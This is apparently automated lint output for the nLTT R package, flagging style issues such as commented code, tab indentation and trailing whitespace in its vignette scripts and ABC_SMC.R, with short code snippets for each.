**Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:40:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L40) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:51:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L51) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:63:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L63) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:70:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L70) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:90:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L90) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:99:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L99) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:103:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L103) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:106:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L106) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:110:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L110) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:114:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L114) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:133:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L133) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:137:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L137) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:141:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L141) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:144:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L144) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:157:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L157) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:169:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L169) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:173:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L173) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:179:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L179) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:184:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_get_nltt_values.R#L184) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:72:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L72) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:79:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L79) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:83:2:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L83) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:91:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/inst/doc/vignette_stretch_nltt_matrix.R#L91) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/ABC_SMC.R:19:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t#Just checking\n  ^\n```\n[R/ABC_SMC.R:20:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \tstop(\"mcmc_nltt: \", \n  ^\n```\n[R/ABC_SMC.R:21:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t \"initial parameter values have to be above zero\\n\",\n  ^\n```\n[R/ABC_SMC.R:22:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t \"but mu was \",parameters[2],\" instead\")\n  ^\n```\n[R/ABC_SMC.R:67:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        new_pp        <- likelihood_function(parameters, phy)\n^\n```\n[R/ABC_SMC.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/ABC_SMC.R:69:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        #accept or reject\n^\n```\n[R/ABC_SMC.R:70:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L70) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        if ( is.finite(new_pp) &&\n^\n```\n[R/ABC_SMC.R:71:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          is.finite(hr) &&\n^\n```\n[R/ABC_SMC.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n^\n```\n[R/ABC_SMC.R:73:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          pp <- new_pp\n^\n```\n[R/ABC_SMC.R:74:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        } else {\n^\n```\n[R/ABC_SMC.R:75:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          parameters[j] <- eta\n^\n```\n[R/ABC_SMC.R:76:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L76) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        }\n^\n```\n[R/ABC_SMC.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    } else {\n^\n```\n[R/ABC_SMC.R:78:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    \t\tparameters[j] <- eta\n^\n```\n[R/ABC_SMC.R:78:6:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    \t\tparameters[j] <- eta\n     ^~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/ABC_SMC.R:280:26:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​  #check data type of phy \n                         ^\n```\n[R/ABC_SMC.R:287:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L287) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:293:5:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L293) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(parameters[2] < 0) {\n    ^\n```\n[R/ABC_SMC.R:295:23:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L295) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \tstop(\"mcmc_nltt: \", \n                      ^\n```\n[R/ABC_SMC.R:340:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L340) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:341:11:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L341) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n          ^\n```\n[R/ABC_SMC.R:341:52:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L341) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                   ^\n```\n[R/ABC_SMC.R:341:53:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L341) *style:* **Trailing whitespace is superfluous.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:342:31:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L342) *style:* **Put spaces around all infix operators.**\n```r\n​\t        new_pp        <- likelihood_function(parameters, phy)\n                             ~^~~\n```\n[R/ABC_SMC.R:343:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L343) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/ABC_SMC.R:345:20:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L345) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t        if ( is.finite(new_pp) &&\n                   ^\n```\n[R/ABC_SMC.R:347:26:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L347) *style:* **Put spaces around all infix operators.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n                         ^~\n```\n[R/ABC_SMC.R:347:31:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L347) *style:* **Put spaces around all infix operators.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n                              